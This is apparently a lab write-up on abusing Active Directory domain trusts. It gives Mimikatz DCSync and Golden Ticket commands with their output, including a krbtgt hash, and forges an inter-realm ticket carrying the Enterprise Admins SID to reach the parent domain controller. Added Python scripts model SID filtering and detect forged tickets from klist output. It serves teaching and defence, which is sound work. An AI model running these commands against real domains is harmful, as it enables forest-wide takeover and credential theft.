Domain Trusts
The key concept behind exploiting domain trusts: if we take control of the root domain, we are in a position to compromise all of the regional (child) domains.
Domain trusts are a mechanism that lets users in one domain gain access to resources in another domain.
For the most part, trusts define how the domains inside a forest communicate with each other. In some environments, trusts can be extended to external domains and, in some cases, to other forests. (A forest is a collection of one or more domain trees inside an AD network.)
There are two main types of trusts that can be configured between domains:
- Directional: the direction of the trust flows from a trusting domain to a trusted domain.
- Transitive: the trust relationship extends beyond just two domains to include other trusted domains.
KRBTGT and Golden Tickets
KRBTGT is the account used by Microsoft's implementation of Kerberos. It acts as the service account for the Key Distribution Center (KDC) service, which handles all Kerberos ticket requests, and its key is used to encrypt and sign every Kerberos ticket in the domain. Because the KRBTGT password hash is shared by all domain controllers, any DC can verify the authenticity of a TGT presented to it when a user requests access to a resource.
Generating our own TGTs to grant ourselves access to everything is known as a Golden Ticket attack. In a Golden Ticket attack we bypass the KDC altogether and create our own TGTs, essentially becoming a Ticket Granting Server (TGS).
In order to forge TGTs, we need the following information:
- FQDN of the domain
- Security Identifier (SID) of the domain
- Username of the account we want to impersonate
- KRBTGT password hash
Recovering the KRBTGT password hash requires a domain compromise, since it is only stored on domain controllers. With Mimikatz:
privilege::debug
lsadump::dcsync /user:za\krbtgt
Output:
[DC] 'za.adobe.loc' Will be the Domain
[DC] 'THMDC.za.adobe.loc' Will be the DC Server
[DC] 'za\krbtgt' Will be the User Account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/25/2022 6:18:22 PM
Object Security ID : S-1-5-21-3885271727-2693558621-2658995185-502
Object Relative ID : 502
Credentials:
Hash NTLM: 16f9af38fca3ada405386b3b57366082
ntlm- 0: 16f9af38fca3ada405386b3b57366082
lm - 0: 35c7b671efe40860dc078afd2786c902
[...]
Inter-Realm TGTs
Using the KRBTGT password hash, we could now forge a Golden Ticket to access any resource in the child domain.
We can take this a step further by forging an Inter-Realm TGT. Inter-realm TGTs are used to provide access to resources in other domains, for example by exploiting the bidirectional trust relationship between the child and parent domain to gain full access to the parent domain.
To do this, we include extra account SIDs from other domains when we construct the Golden Ticket.
We will exploit the trust the parent domain has with our child domain by adding the SID of the Enterprise Admins (EA) group as an extra SID to the ticket we forge for the domain controller of the child domain. The EA group belongs to the parent domain, and membership of this group essentially grants administrative privileges over the entire forest.
To exploit this, we need to recover two SIDs:
- SID of the child domain controller (in this scenario THMDC), which we will impersonate in our forged TGT
- SID of the Enterprise Admins group in the parent domain, which we will add as an extra SID to our forged TGT
PowerShell (Get-ADComputer and Get-ADGroup):
# Name of the Child Domain Controller [In this Scenario THMDC]
Get-ADComputer -Identity "THMDC"
# Recover the SID of the Enterprise Admins Group to Query the Parent Domain Controller [In this Scenario thmrootdc.adobe.loc]
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.adobe.loc
Output:
DistinguishedName : CN=THMDC,OU=Domain Controllers,DC=za,DC=adobe,DC=loc
DNSHostName : THMDC.za.adobe.loc
Enabled : True
Name : THMDC
ObjectClass : computer
ObjectGUID : bd651750-782b-4b09-93b4-b5987ec7311b
SamAccountName : THMDC$
SID : S-1-5-21-3885271727-2693558621-2658995185-1001
UserPrincipalName :
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=adobe,DC=loc
GroupCategory : Security
GroupScope : Universal
Name : Enterprise Admins
ObjectClass : group
ObjectGUID : a23ae384-16e8-44d5-9b36-8173c4e0e5de
SamAccountName : Enterprise Admins
SID : S-1-5-21-3330634377-1326264276-632209373-519
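The extra SID works because the parent domain honours every SID it finds in the ticket's PAC, SID history entries included: trusts between domains of the same forest do not apply SID filtering by default, which is why Microsoft treats the forest, not the domain, as the security boundary. On a trust that does filter (SID filtering is on by default for forest and external trusts), the receiving domain discards any SID that was not issued by the trusted domain, and the Enterprise Admins SID would never reach the parent. The Python below is an added example, not code from the page or from Mimikatz, that models that filtering step over the SIDs the page shows: the child domain SID S-1-5-21-3885271727-2693558621-2658995185 (the krbtgt object SID without its RID) and the forest root SID S-1-5-21-3330634377-1326264276-632209373 (the Enterprise Admins SID without its RID). The PAC contents are reconstructed from the User Id, Groups Id and Extra SIDs fields mimikatz prints rather than parsed from a real ticket, and the severity labels are my own.

```python
import re

# Well-known RIDs from Microsoft's documented SID list; the page's "Groups Id"
# line (513 512 520 518 519) and the Enterprise Admins SID (...-519) use these.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    513: "Domain Users",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}
HIGH_VALUE_RIDS = {500, 512, 518, 519}

# Domain SIDs taken from the page: child domain za.adobe.loc and forest root adobe.loc.
CHILD_DOMAIN_SID = "S-1-5-21-3885271727-2693558621-2658995185"
ROOT_DOMAIN_SID = "S-1-5-21-3330634377-1326264276-632209373"

_DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Return (domain_sid, rid) for a domain-style SID; ValueError otherwise."""
    m = _DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return m.group(1), int(m.group(2))


def pac_sids_from_mimikatz(domain_sid, user_id, group_ids, extra_sids):
    """Rebuild the SID set a forged PAC carries from the fields mimikatz prints
    (User Id, Groups Id, Extra SIDs). This is a constructed model, not PAC parsing."""
    sids = [f"{domain_sid}-{user_id}"]
    sids += [f"{domain_sid}-{rid}" for rid in group_ids]
    sids += list(extra_sids)
    return sids


def sid_filter(trusted_domain_sid, pac_sids):
    """Simplified model of SID filtering on a trust boundary.

    The filtering domain keeps only SIDs issued by the trusted (sending) domain
    and drops every other domain SID. Returns (kept, dropped_with_reason).
    """
    kept, dropped = [], []
    for sid in pac_sids:
        domain, rid = split_sid(sid)
        if domain == trusted_domain_sid:
            kept.append(sid)
            continue
        name = WELL_KNOWN_RIDS.get(rid, f"RID {rid}")
        severity = "high" if rid in HIGH_VALUE_RIDS else "low"
        dropped.append((sid, f"foreign-domain SID ({name}), severity {severity}"))
    return kept, dropped


def audit_forged_ticket():
    """Run the model against the ticket the page forges: User Id 500, Groups Id
    513 512 520 518 519 in the child domain, plus the root EA SID as extra SID."""
    pac = pac_sids_from_mimikatz(
        CHILD_DOMAIN_SID, 500, [513, 512, 520, 518, 519],
        [f"{ROOT_DOMAIN_SID}-519"],
    )
    return sid_filter(CHILD_DOMAIN_SID, pac)


if __name__ == "__main__":
    kept, dropped = audit_forged_ticket()
    print("accepted:", *kept, sep="\n  ")
    print("stripped:", *dropped, sep="\n  ")
```

Run directly, the six child-domain SIDs pass and the Enterprise Admins SID from adobe.loc is stripped. SID filtering can be enabled on a child trust as well, but that also discards legitimate SID history for migrated accounts, which is why the usual guidance is to design around the forest as the boundary rather than to rely on filtering inside it.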
Exploiting Domain Trusts
We can use Mimikatz to generate the Golden Ticket:
privilege::debug
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password Hash of krbtgt User> /sids:<SID of Enterprise Admins Group> /ptt
:: Query Example in this Scenario
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-63
Output:
User : Administrator
Domain : za.adobe.loc (ZA)
SID : S-1-5-21-3885271727-2693558621-2658995185-1001
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3330634377-1326264276-632209373-519 ;
ServiceKey: 16f9af38fca3ada405386b3b57366082 - rc4_hmac_nt
Service : krbtgt
Lifetime : 1/12/2023 12:09:18 AM ; 1/9/2033 12:09:18 AM ; 1/9/2033 12:09:18 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ za.adobe.loc' Successfully submitted for Current Session.
Verifying the Access
First, we verify that this ticket grants access to THMDC, since it is a valid ticket for the Administrator user of the child domain. This confirms that the Golden Ticket was forged correctly for the child DC.
We can also verify that the tickets were correctly injected with the Windows built-in command klist.
:: List Target Machine Contents
dir \\thmdc.za.adobe.loc\c$
:: Displays a list of currently Cached Kerberos Tickets
klist
If we specified extra SIDs, we should also now have access to the parent DC.
:: List Target Machine Contents
dir \\thmrootdc.adobe.loc\c$\
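The same klist listing that confirms the injection above also exposes the forged ticket to a defender. Mimikatz gave the ticket a ten-year lifetime (the Lifetime line in its output) and built it from the RC4 (NTLM) key of the krbtgt account, whereas a TGT issued under the Default Domain Policy lives at most 10 hours and renews for at most 7 days. The script below is an added example, not part of the page: it parses klist-style output and flags those indicators. The klist text is constructed in the shape of real klist output, with one entry modelled on the page's ticket and one ordinary TGT; the policy values are the AD defaults and should be adjusted to the audited domain.

```python
import re
from datetime import datetime, timedelta

# Kerberos settings from the Default Domain Policy: a TGT may live at most
# 10 hours and be renewed for at most 7 days. Adjust to the audited domain.
MAX_TICKET_AGE = timedelta(hours=10)
MAX_RENEW_AGE = timedelta(days=7)
TIME_FMT = "%m/%d/%Y %H:%M:%S"

# Constructed sample in the shape of `klist` output (not captured from the
# page's lab). Entry #0 mirrors the ticket the page injects: ten-year lifetime
# and an RC4 key. Entry #1 is an ordinary AES TGT issued under default policy.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ ZA.ADOBE.LOC
        Server: krbtgt/za.adobe.loc @ ZA.ADOBE.LOC
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 1/12/2023 0:09:18 (local)
        End Time:   1/9/2033 0:09:18 (local)
        Renew Time: 1/9/2033 0:09:18 (local)

#1>     Client: jdoe @ ZA.ADOBE.LOC
        Server: krbtgt/za.adobe.loc @ ZA.ADOBE.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 1/12/2023 8:00:00 (local)
        End Time:   1/12/2023 18:00:00 (local)
        Renew Time: 1/19/2023 8:00:00 (local)
"""

# One "Field name: value" line; the lazy key stops at the first colon.
_FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?):\s+(.+?)\s*$", re.MULTILINE)


def parse_klist(text):
    """Split klist output on the '#n>' entry markers and return one dict of
    'Field name' -> value per cached ticket."""
    tickets = []
    for chunk in re.split(r"^#\d+>", text, flags=re.MULTILINE):
        fields = dict(_FIELD_RE.findall(chunk))
        if "Client" in fields:
            tickets.append(fields)
    return tickets


def _parse_time(value):
    """Turn '1/12/2023 0:09:18 (local)' into a datetime."""
    return datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)


def audit_ticket(ticket):
    """Return the forged-TGT indicators present on one klist entry."""
    findings = []
    start = _parse_time(ticket["Start Time"])
    end = _parse_time(ticket["End Time"])
    renew = _parse_time(ticket["Renew Time"])
    if end - start > MAX_TICKET_AGE:
        findings.append(f"lifetime {end - start} exceeds policy maximum {MAX_TICKET_AGE}")
    if renew - start > MAX_RENEW_AGE:
        findings.append(f"renew window {renew - start} exceeds policy maximum {MAX_RENEW_AGE}")
    if "RC4" in ticket.get("KerbTicket Encryption Type", ""):
        # Only meaningful where the domain's accounts support AES; an RC4 TGT
        # there points at a ticket built from the NTLM hash, as on this page.
        findings.append("RC4-encrypted TGT in an AES-capable domain")
    return findings


def audit_klist(text):
    """Map each cached ticket's client principal to its list of findings."""
    return {t["Client"]: audit_ticket(t) for t in parse_klist(text)}


if __name__ == "__main__":
    for client, findings in audit_klist(SAMPLE_KLIST).items():
        print(client, "->", findings or "no indicators")
```

The ordinary entry sits exactly at the policy limits (10 hours, 7 days) and produces no findings, so the checks only fire on tickets that exceed what the KDC could have issued; the same comparison can be applied to Event ID 4768 ticket-granting data collected centrally rather than to klist on one host.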